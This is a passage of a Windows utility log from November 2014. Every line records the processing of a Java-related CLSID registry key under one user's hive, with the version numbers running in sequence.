[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBB}]
